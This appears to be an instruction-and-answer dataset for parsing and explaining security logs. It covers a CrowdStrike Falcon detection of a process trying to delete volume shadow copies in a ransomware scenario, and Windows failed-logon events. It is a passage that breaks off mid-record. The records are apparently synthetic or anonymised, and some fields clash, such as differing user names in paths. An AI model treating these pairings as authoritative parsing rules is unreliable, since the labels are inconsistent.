pipelineEntrypoint=dispatch
{ "clienthostname": "SSTEWART-LT3.undefined", "clientmac": "00155d4a00da", "filehash": "3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249", "filename": "setup.exe", "filepath": "\\Device\\HarddiskVolume3\\Users\\StevenStewart\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-06-12T13:04:28Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\charlie\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe /clone_wait \\\"/W32:8923024:1024\\\"\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"charlie\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889\",\"sha256\":\"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249\",\"md5\":\"8ca190715cd1b0f67a9e14ecbc7bc27e\",\"parent_details\":{\"parent_sha256\":\"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee\",\"parent_md5\":\"ab7850166bd390bb01602ddc766cc662\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\charlie\\\\Downloads\\\\TMVirtualPortDriver870a.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-06-12T13:04:28Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "33.80.171.219", "userName": "charlie" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\charlie\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\charlie\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\charlie\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\charlie\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: SSTEWART-LT3.undefined clientmac: 00155d4a00da filehash: 3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 filename: setup.exe filepath: \Device\HarddiskVolume3\Users\StevenStewart\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-06-12T13:04:28Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 33.80.171.219 userName: charlie
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t63.128.8.62\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"63.128.8.62","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
{ "action": "Logon", "clientport": 54979, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tjohndoe\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t63.128.8.62\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"oscorp\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"63.128.8.62\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"johndoe\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6122059274", "streamName": "microsoft-windows-security-auditing", "clientIP": "63.128.8.62", "userName": "johndoe" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t63.128.8.62\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"63.128.8.62","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t63.128.8.62\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"63.128.8.62","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 54979 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6122059274 streamName: microsoft-windows-security-auditing clientIP: 63.128.8.62 userName: johndoe
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t241.157.102.148\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"241.157.102.148","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
{ "action": "Logon", "clientport": 54979, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t241.157.102.148\\n\\tSource 